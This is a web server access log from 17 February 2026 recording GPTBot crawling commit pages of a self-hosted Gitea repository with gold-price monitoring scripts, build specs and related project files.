"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log" -[17/Feb/2026:17:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.png?display=rendered" [Client 74.7.227.38] [Length 10820] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.png" -[17/Feb/2026:17:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py?display=source" [Client 74.7.227.38] [Length 18575] [Gzip 5.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:17:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17363] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec?display=source" [Client 74.7.227.38] [Length 12538] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:17:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17365] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py?display=source" [Client 74.7.227.38] [Length 14500] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:17:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libmodbus-5.dll?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:17:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:17:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py" -[17/Feb/2026:17:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py?display=rendered" [Client 74.7.227.38] [Length 10927] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:17:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.png?display=rendered" [Client 74.7.227.38] [Length 10790] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.png" -[17/Feb/2026:17:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv?display=source" [Client 74.7.227.38] [Length 11253] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:17:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log?display=source" [Client 74.7.227.38] [Length 11476] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log" -[17/Feb/2026:17:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec?display=source" [Client 74.7.227.38] [Length 12245] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec" -[17/Feb/2026:17:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat?display=source" [Client 74.7.227.38] [Length 13153] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat" -[17/Feb/2026:17:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libintl-8.dll?display=rendered" [Client 74.7.227.38] [Length 10863] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:17:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec?display=source" [Client 74.7.227.38] [Length 12310] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:17:27:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py?display=source" [Client 74.7.227.38] [Length 20885] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:17:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py?display=source" [Client 74.7.227.38] [Length 18018] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:17:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py?display=source" [Client 74.7.227.38] [Length 19410] [Gzip 6.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:17:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py?display=rendered" [Client 74.7.227.38] [Length 10929] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:17:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py?display=source" [Client 74.7.227.38] [Length 12586] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py" -[17/Feb/2026:17:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt?display=source" [Client 74.7.227.38] [Length 12105] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt" -[17/Feb/2026:17:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec?display=source" [Client 74.7.227.38] [Length 12540] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:17:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec?display=source" [Client 74.7.227.38] [Length 12343] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:17:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py?display=source" [Client 74.7.227.38] [Length 12885] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py" -[17/Feb/2026:17:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:17:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec?display=source" [Client 74.7.227.38] [Length 12372] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec" -[17/Feb/2026:17:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:17:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/my_database.db" -[17/Feb/2026:17:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv?display=source" [Client 74.7.227.38] [Length 11404] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv" -[17/Feb/2026:17:27:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17364] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libiconv-2.dll?display=rendered" [Client 74.7.227.38] [Length 10828] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:17:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:17:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py?display=rendered" [Client 74.7.227.38] [Length 10924] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:17:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:17:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py?display=rendered" [Client 74.7.227.38] [Length 10929] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:17:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version" -[17/Feb/2026:17:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:17:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md?display=source" [Client 74.7.227.38] [Length 12528] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md" -[17/Feb/2026:17:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py?display=rendered" [Client 74.7.227.38] [Length 10925] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:17:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py" -[17/Feb/2026:17:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:17:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py?display=source" [Client 74.7.227.38] [Length 19912] [Gzip 6.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:17:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico?display=rendered" [Client 74.7.227.38] [Length 10777] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico" -[17/Feb/2026:17:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py?display=source" [Client 74.7.227.38] [Length 21335] [Gzip 7.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:17:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17364] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/my_database.db" -[17/Feb/2026:17:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17369] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 